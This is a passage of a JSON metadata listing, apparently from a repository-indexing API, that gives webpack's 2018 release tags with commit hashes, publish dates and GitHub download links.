.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/w